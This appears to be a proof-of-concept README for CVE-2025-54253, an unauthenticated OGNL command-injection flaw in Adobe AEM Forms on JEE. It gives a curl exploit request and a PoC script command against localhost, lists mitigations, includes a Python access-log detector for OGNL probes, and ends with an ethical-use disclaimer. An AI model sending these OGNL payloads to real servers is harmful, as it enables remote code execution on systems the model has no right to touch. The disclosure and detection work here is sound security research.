CVE-2025-54253 is a critical OGNL injection vulnerability in Adobe AEM Forms on JEE. It allows unauthenticated attackers to execute arbitrary operating system commands via the `/adminui/debug?debug=OGNL:` endpoint.
- Severity: Critical
- CVSS Score: 9.8 (Pending)
- Attack Vector: Remote
- Authentication Required: No
- Affected Product: Adobe AEM Forms on JEE (<= 6.5.23.0)
- Status: Confirmed exploitability
This vulnerability lies in an exposed debugging interface that evaluates user-controlled OGNL expressions without proper sanitization or authentication. Exploiting it can lead to remote code execution under the context of the application server.
📝 Note: This vulnerability affects installations that expose the `/adminui/debug` endpoint publicly or internally without proper access control.
Simple OGNL expressions demonstrate command execution via browser or curl:

```bash
curl "http://localhost:4502/adminui/debug?debug=OGNL:whoami"
python3 poc/cve-2025-54253-poc.py --url http://127.0.0.1:4502 --cmd "whoami"
```
The script logs command execution output to `exploit.log`.
- Set up a vulnerable Adobe AEM instance (<= 6.5.23.0).
- Python (PoC scripting)
- Flask (simulated server)
- Kali Linux
- curl & browser
- GitHub (PoC publishing)
- Restrict access to `/adminui/debug`
- Apply vendor patches as available
- Monitor for unauthorized OGNL expressions in access logs
- Use WAF or proxy filtering to block such patterns
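As an added example (not part of this PoC repository), the following Python sweep implements the log-monitoring bullet above: it flags every request that reaches `/adminui/debug` and escalates those whose `debug` parameter carries an `OGNL:` expression, decoding percent-encoding first so an encoded colon is not missed. The access-log lines, IP addresses and timestamps are constructed samples.

```python
"""Access-log sweep for CVE-2025-54253 exposure (added example, not the repo's PoC).

Flags every request to the AEM Forms /adminui/debug endpoint and escalates those
whose `debug` parameter carries an OGNL: expression. Log lines are constructed
samples in the combined log format; IPs and timestamps are made up.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

DEBUG_PATH = "/adminui/debug"
# host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def classify_target(target: str):
    """Return 'ognl', 'debug-endpoint' or None for one request target.

    Percent-decoding is applied twice so an encoded colon (OGNL%3A) or a
    double-encoded path does not evade a plain substring match.
    """
    decoded = unquote(unquote(target))
    parts = urlsplit(decoded)
    if DEBUG_PATH not in parts.path.lower():
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("debug", []):
        if value.lstrip().upper().startswith("OGNL:"):
            return "ognl"
    return "debug-endpoint"

def scan_access_log(lines):
    """Return (severity, ip, time, status, decoded target) for each flagged line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        verdict = classify_target(m.group("target"))
        if verdict:
            hits.append((verdict, m.group("ip"), m.group("time"),
                         int(m.group("status")), unquote(unquote(m.group("target")))))
    return hits

# Constructed sample log: one benign page, two OGNL attempts (one blocked with 403
# by a WAF, still worth alerting on) and one plain touch of the debug endpoint.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Aug/2025:12:00:01 +0000] "GET /content/forms/af/demo.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Aug/2025:12:00:02 +0000] "GET /adminui/debug?debug=OGNL:whoami HTTP/1.1" 200 64',
    '198.51.100.7 - - [10/Aug/2025:12:00:03 +0000] "GET /adminui/debug?debug=OGNL%3Awhoami HTTP/1.1" 403 0',
    '10.0.0.9 - - [10/Aug/2025:12:00:04 +0000] "GET /adminui/debug?debug=trace HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

A 403 on the OGNL line still appears in the output: a blocked attempt is the earliest signal that the endpoint is being probed.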
⚠️ Disclaimer:
This PoC is for educational purposes only. Do not use it against systems you do not own or have explicit permission to test.
Shivshant Patil
Certified Ethical Hacker (CEH v13)
B.Tech Computer Engineering Graduate